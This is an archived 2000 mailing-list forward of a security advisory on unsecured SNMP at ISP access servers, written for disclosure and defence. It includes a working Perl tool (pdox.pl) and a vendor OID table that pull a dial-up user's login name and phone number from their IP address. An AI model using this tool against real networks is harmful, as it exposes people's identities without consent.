[iwar] FW: [NEWS] Lack of network security found in major backbone providers
From: Robert W. Miller
To: ,
From: snooker@iex.net
To: htcc@onelist.com
Thu, 20 Apr 2000 12:11:50 -0600
fc Thu Apr 20 11:13:13 2000
Received: from 207.222.214.225
by localhost with POP3 (fetchmail-5.1.0)
for fc@localhost (single-drop); Thu, 20 Apr 2000 11:13:13 -0700 (PDT)
Received: by multi33.netcomi.com for fc
(with Netcom Interactive pop3d (v1.21.1 1998/05/07) Thu Apr 20 18:13:08 2000)
X-From_: sentto-279987-305-fc=all.net@returns.onelist.com Thu Apr 20 13:12:30 2000
Received: from mw.egroups.com (mw.egroups.com [207.138.41.167]) by multi33.netcomi.com (8.8.5/8.7.4) with SMTP id NAA15867 for ; Thu, 20 Apr 2000 13:12:30 -0500
X-eGroups-Return: sentto-279987-305-fc=all.net@returns.onelist.com
Received: from [10.1.10.35] by mw.egroups.com with NNFMP; 20 Apr 2000 18:12:32 -0000
Received: (qmail 3360 invoked from network); 20 Apr 2000 18:12:30 -0000
Received: from unknown (10.1.10.26) by m1.onelist.org with QMQP; 20 Apr 2000 18:12:30 -0000
Received: from unknown (HELO mail.iex.net) (192.156.196.5) by mta1 with SMTP; 20 Apr 2000 18:12:30 -0000
Received: from oemcomputer (p95-s8.cos1-ras.iex.net [209.151.65.191]) by mail.iex.net (8.9.1/8.9.1) with SMTP id MAA17929; Thu, 20 Apr 2000 12:02:19 -0600 (MDT)
To: ,
Message-ID:
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
From: "Robert W. Miller"
MIME-Version: 1.0
Mailing-List: list iwar@egroups.com; contact iwar-owner@egroups.com
Delivered-To: mailing list iwar@egroups.com
Precedence: bulk
List-Unsubscribe:
Date: Thu, 20 Apr 2000 12:11:50 -0600
Reply-To: iwar@egroups.com
Subject: [iwar] FW: [NEWS] Lack of network security found in major backbone providers
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
The following security advisory is sent to the securiteam mailing
list, and can be found at the SecuriTeam web site:
http://www.securiteam.com
Lack of network security found in major backbone providers
-------------------------------------------------------------
SUMMARY
Although prized by many users of the Internet, the concept of privacy
has
been threatened from many angles in recent years. With the rise of
free
web-based e-mail and advertisement-sponsored dialup, users have been
providing more personal information about their shopping habits and
interests, but rarely anything that can trace them to their real-life
identity, such as a Internet login name, real name, home phone number,
or
SSN. A team from Philtered.Net has recently found that this has not
been
the case for many years. Due to security issues that have been long
known
and long unresolved on the network level, it is possible to retrieve a
user's ISP login name remotely, and on some pieces of hardware, their
home
phone number, without their knowledge. The only information required
to
preform this transaction is the user's IP address, which can be
retrieved
via logs of recently visited web pages, or, not surprisingly, from the
headers of e-mails sent via services such as HotMail .
In our eyes, this is a problem.
DETAILS
Background:
Every machine on the Internet, short of some private networks, is
addressed via an IP address. This IP address is a unique identity for
the
computer for the duration of connection to the network. When
communication with another system on the Internet is conducted, each
packet sent is tagged with the recipient and the sender's IP address.
Consequently, it is possible to route backwards to the end user's
machine.
This is not important for our discussion.
Enter SNMP, the Simple Network Management Protocol. This protocol
allows
users of network equipment, (ie. Network Administrators), to remotely
query the state of the machine to test for system load, utilization,
and
configuration. This technique facilitates centralized network
monitoring,
an important capability for high-reliability networks.
The problem, however, is that many of those who run these networks
neglected to provide for the proper security restrictions. Because of
this, remote unauthorized users can query the state of private
networks.
This is not a new problem. This is a very old issue that has been
ignored
for too long. What is new, however, is the large number of users who
are
now on dialup access, and consequently, dialed into unsecured servers.
Additionally, no one released a tool that specifically targets
personal
information in this way -- until now.
A member of Phitered.Net has written a tool using Perl and the
CMU-SNMP
library that can extract personal information of the end user via
connecting to their network access server. This also means that no
connection to the end user is ever made; the only network connection
made
is to the first machine after the end user.
Details:
To show how simple it is to gain information, via the Internet, based
simply on their current IP address, here is a step by step description
on
how we might gain personal information about a user with the IP
address
1.2.3.4. It is important to note that in most cases our target will
not
even know that they are a target of inquiry, since the procedure does
not
specify for any packets to be sent to their personal computer. For the
most simple attack, we need to know the address of the device that our
target is connected through, that is to say, the first machine that
each
packet to the Internet is being routed through. If we executed a
'traceroute' to the users address, they could surely see our traffic.
However, because most of the end user access devices (ie terminal
servers,
DSL access units) handle many users, it is usually possible to trace
to an
IP address just one or two addresses from our target. In this case,
we
will trace to 1.2.3.5. Our theoretical traceroute shows us that the
hop
The theoretical attacker can often determine the speed and type of
connection, the username used on the ISP, idle time, time online, and
most
disturbingly, other personal information, such as the phone number of
the
end user.
In some cases, the MIB is also writable by remote users. In this
situation, remote users can maliciously disconnect the end user, or
alter
their data routes. In some cases, the entire device that the end user
is
connected to can be powered down or rebooted.
Testing if you are vulnerable:
Below is the Perl script we used to demonstrate the issue. Please use
this
to only test your own network.
--- Start of pdox.pl ---
#!/usr/bin/perl
#
## By: lumpy_
#
## Description:
## Polls SNMP data on terminal servers.
#
## Requires:
##
## UCD-SNMP
## - By: Wes Hardaker
## - ftp://ucd-snmp.ucdavis.edu:/ucd-snmp.tar.gz
## Net::SNMP
## - By: David M. Town
## - ../CPAN/modules/by-module/Net/Net-SNMP-2.00.tar.gz
#
## Many thanks to:
## Javaman, Sangfroid, miff, floydy, negapluck, sirsyko, hyenur, and
hal
##
#
use Net::SNMP;
sub syntax {
print "Syntax:\n\tpdox _NAS_DEVICE_ _IP_ [community]\n\n";
exit(1);
}
sub snmpget {
($oid_to_get)=@_;
($session, $error) = Net::SNMP->session(
Hostname => $hostname, Community => $community, Port =>
$port );
if (!defined($session)) { print("## Cant open device.\n"); exit(1); }
if (!defined($response = $session->get_request($oid_to_get))) {
printf("## %s\n", $session->error); $session->close;exit(1);}
$retval=$response->{$oid_to_get};
$session->close;
$retval=unpack("A*",pack("H*",$retval)) if (retval =~ /^0x/);
return($retval);
}
sub snmpwalk {
($oid_to_get)=@_;
($session, $error) = Net::SNMP->session(
Hostname => $hostname, Community => $community, Port =>
$port );
if (!defined($session)) { print("## Cant open device.\n"); exit(1); }
if (!defined($response = $session->get_table($oid_to_get))) {
printf("## %s\n", $session->error); $session->close;exit(1);}
$retval=$response;
$session->close;
return($retval);
}
## Main
$hostname = @ARGV[0];
$ip_were_hunting = @ARGV[1];
$community = @ARGV[2] || 'public';
$port = 161;
if (!$hostname || !$ip_were_hunting) { syntax; }
print "\n### pdox 2.0\n";
$sysdesc=snmpget('1.3.6.1.2.1.1.1.0');
print "## Got System Description: ",substr($sysdesc,0,50),"\n";
$found=0;
open(DAT,"pdox.dat");
while() {
next if (/^#/);
@parts=split;
if ($sysdesc =~ /@parts[0]/i) {$found++; last;}
}
if (!($found)) { print "## Unsupported device!\n"; exit(1); }
$userlist=snmpwalk(@parts[1]);
$found=0;
foreach ( sort keys %$response ) {
if ($response->{$_} eq $ip_were_hunting)
{$location=$_; substr($location,0,length(@parts[1]))=""; $found++;
print "## Found $ip_were_hunting in mib. location: $location\n";
}
}
if (!($found)) { print "## Couldnt find user in mib!\n"; exit(1); }
if (defined(@parts[2])) {
print "## Username: ",snmpget(@parts[2].$location),"\n";}
if (defined(@parts[3])) {
print "## Phone: ",snmpget(@parts[3].$location),"\n";}
print "\n";
exit 0;
--- End of pdox.pl ---
--- Start of pdox.dat ---
#Vendor User Address Phone
livingston 1.3.6.1.4.1.307.3.2.1.1.1.14 1.3.6.1.4.1.307.3.2.1.1.1.4
lucent 1.3.6.1.4.1.307.3.2.1.1.1.14 1.3.6.1.4.1.307.3.2.1.1.1.4
ascend 1.3.6.1.4.1.529.12.2.1.4 1.3.6.1.4.1.529.12.2.1.3
nortel 1.3.6.1.4.1.166.1.14.2.1.19 1.3.6.1.4.1.166.1.14.2.1.4
shiva 1.3.6.1.4.1.166.1.14.2.1.19 1.3.6.1.4.1.166.1.14.2.1.4
cisco 1.3.6.1.4.1.9.10.19.1.3.1.1.4 1.3.6.1.4.1.9.10.19.1.3.1.1.3
annex-pri 1.3.6.1.4.1.15.2.11.3.1.6 1.3.6.1.4.1.15.2.16.1.1.1.1
1.3.6.1.4.1.15.2.16.1.1.1.2
annex 1.3.6.1.4.1.15.2.3.7.1.51 1.3.6.1.4.1.15.2.3.8.1.2
hiper 1.3.6.1.4.1.429.4.11.2.2.1.7 1.3.6.1.4.1.429.4.11.2.1.1.3
cvx .1.3.6.1.4.1.2637.2.2.101.1.13 .1.3.6.1.4.1.2637.2.2.101.1.12
1.3.6.1.4.1.2637.2.2.101.1.29
aptis .1.3.6.1.4.1.2637.2.2.101.1.13 .1.3.6.1.4.1.2637.2.2.101.1.12
1.3.6.1.4.1.2637.2.2.101.1.29
--- End of pdox.dat ---
Fix:
- Block SNMP access.
- Change community names.
- Filter access to network hardware.
Conclusion:
It is important to note that these security holes are as easy to
exploit
on DSL connections as they are wit dialup connections.
These problems are easily located by security scanning software. ISPs
need to be aware that they are not exempt from needing constant
security
audits in order to ensure QoS.
ADDITIONAL INFORMATION
The information was provided by: JavaMan
and
Lumpy.
=======================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email
to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty
of any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits
or special damages.
Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net
------------------------------------------------------------------------
Enjoy the award-winning journalism of The New York Times with
convenient home delivery. And for a limited time, get 50% off for the
first 8 weeks by subscribing. Pay by credit card and receive an
additional 4 weeks at this low introductory rate.
http://click.egroups.com/1/3102/7/_/595019/_/956254351/
------------------------------------------------------------------------
------------------
http://all.net/